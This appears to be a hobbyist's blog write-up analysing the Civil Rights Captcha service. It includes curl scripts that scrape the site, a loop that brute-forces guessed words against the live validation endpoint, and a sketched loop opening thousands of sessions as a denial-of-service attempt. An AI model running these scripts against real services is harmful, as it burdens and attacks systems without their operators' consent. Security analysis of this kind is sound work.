Warning - nerdy content. I spent a lazy afternoon back in Dublin pulling apart the Civil Rights Captcha, and I wanted to save my notes by sticking them on the blog.
The Civil Rights Captcha is a system that aims to educate people on civil rights as well as tell humans from robots.
Note that Wired, and therefore Hacker News, talk about filtering out internet idiots with this, which isn't mentioned on their site.
First idea - they only have a few questions. I think each question takes a human to come up with and review. They can't really raise civil rights awareness with an incorrect collection of ills, and they don't want to be sued for libel.
Download the page 1000 times.
for x in {0..1000}; do curl -s -o dataset/$x captcha.civilrightsdefenders.org; done
Compare them to one another.
for x in dataset/*; do diff dataset/0 $x | egrep '>'; done | sort | uniq > questions
That gives only 8 questions. Theories as to why:
They might also have many correct answers per question. With a normal captcha you only have one correct answer.
How many answers are there? Use Chrome to grab an image URL. Use curl to hit that URL a few times. Each file has a different sha1sum (it would be nice to have a command line tool that uses a cheaper hash), so possibly a bug in the loop or a genuinely different image each time. Download 1000 images.
mkdir images
for x in {0..1000}; do curl -s -o images/$x 'http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=xJZNm2G1mK5TQQH69mX3&newset=7&lang=en'; done
Hash all the images and count the distinct hashes: 1003 of them.
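Counting is a one-liner (a sketch, assuming GNU coreutils):

sha1sum images/* | awk '{print $1}' | sort -u | wc -l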
Ideas: look at the images. Lots of different words, some negative, some positive. Some duplicate words, but not many. Download 6k images. All of them are different.
Peer at Chrome's debugger. Watch the process. The JavaScript fetches one image with newset=1, and two more without the newset parameter. Each request has a sid parameter set to a random string. The random string is different for each image. The newset request sets a cookie, which is sent back to the server. Example cookie:
Set-Cookie: PHPSESSID=eq0llt1rjtfr0h3fa0mlorrm67; path=/
Random string notes: it's not clear what purpose the random string serves. If I had to guess, it prevents HTTP caching.
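The sid in the page looks like a 20-character alphanumeric token (e.g. xJZNm2G1mK5TQQH69mX3). If you need to mint one yourself, my assumption is the server only cares that it varies, so any random string of the right shape will do:

sid=$(tr -dc 'A-Za-z0-9' < /dev/urandom | head -c 20)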
Once the user enters an answer, it does validation with a request like so:
curl --cookie 'PHPSESSID=e66bfeidg9ukm1ovvk9cn1i8f6' 'http://captcha.civilrightsdefenders.org/captchaAPI/?callback=jQuery1&code=concerned'

Result:
jQuery1({"answer":"false"});
So it presumably stores a map of session to correct answer on the server side, and returns a JSON blob saying whether the user's input is correct.
Code for a session:
set -eux

# Pick a session id and somewhere to keep the artifacts.
session_id=$RANDOM
dir=session-$session_id
mkdir $dir

# Pad the session id out into a sid-shaped string.
random=$(printf "%06daaaaaaaaaaaaaa" $session_id)

# First image: newset=1 starts a server-side session and sets the cookie.
curl -s -o $dir/1.png --dump-header $dir/1.headers "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${random}&newset=1&lang=en"
cookie=$(awk '/Set-Cookie:/{print $2}' $dir/1.headers | tr -d ';')
# Debug: show the cookie header.
awk '/Set-Cookie:/{print $2}' $dir/1.headers

# Two more images, sent with the cookie and without newset.
curl --cookie "$cookie" -s -o $dir/2.png --dump-header $dir/2.headers "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${random}&lang=en"
curl --cookie "$cookie" -s -o $dir/3.png --dump-header $dir/3.headers "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${random}&lang=en"

# Look at the images by hand, then submit the answer.
echo $dir
echo 'work out the answer'
read answer
curl -s --dump-header $dir/answer.headers --cookie "$cookie" "http://captcha.civilrightsdefenders.org/captchaAPI/?callback=jQuery1&code=${answer}"
Start out by sending the contents of /usr/share/dict/british-english:

% wc -l /usr/share/dict/british-english
99156 /usr/share/dict/british-english

It takes 30s to test 100 words, so testing all of british-english would take about 8 hours (99156 / 100 × 30s ≈ 8.3 hours). New plan: find a list of emotion words on the internet and test those instead, like so.
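A sketch of the testing loop, one fresh session per word (a wrong answer kills the session, see below). Here emotion-words is whatever word list you found, and matching "answer":"true" is my guess at the success response:

while read -r word; do
  # New session per word: fetch an image with newset=1 to get a cookie.
  sid=$(tr -dc 'A-Za-z0-9' < /dev/urandom | head -c 20)
  curl -s -o /dev/null --dump-header headers "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${sid}&newset=1&lang=en"
  cookie=$(awk '/Set-Cookie:/{print $2}' headers | tr -d ';\r')
  # One guess against this session's captcha.
  result=$(curl -s --cookie "$cookie" "http://captcha.civilrightsdefenders.org/captchaAPI/?callback=jQuery1&code=${word}")
  echo "$word -> $result"
  case $result in *'"answer":"true"'*) echo "hit: $word";; esac
done < emotion-words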
Even though the key space is quite small, O(100s) of words, brute forcing is hard because any false answer drops the session.
This is more robust than I expected; a lot of the attacks I expected to work don't. There are fairly few questions, but the questions don't matter. There are O(100s) of text answers, but it's generating a new image for each request, so there isn't any point in solving the images offline (or spending time trying to use their site as an oracle for the images). It reduces down to the normal image captcha problem - OCRing images online. It's also probably vulnerable to DoS attacks that open many sessions.
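For what it's worth, "opening many sessions" is just the newset request in a loop; a hypothetical, untested sketch:

for x in {0..100000}; do
  # Each newset request makes the server create and store a fresh PHP session.
  curl -s -o /dev/null "http://captcha.civilrightsdefenders.org/captchaAPI/securimage_show.php?sid=${x}aaaaaaaaaaaaaa&newset=1&lang=en"
done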
Post-script: actually reading their docs shows that it's based on PHP captcha.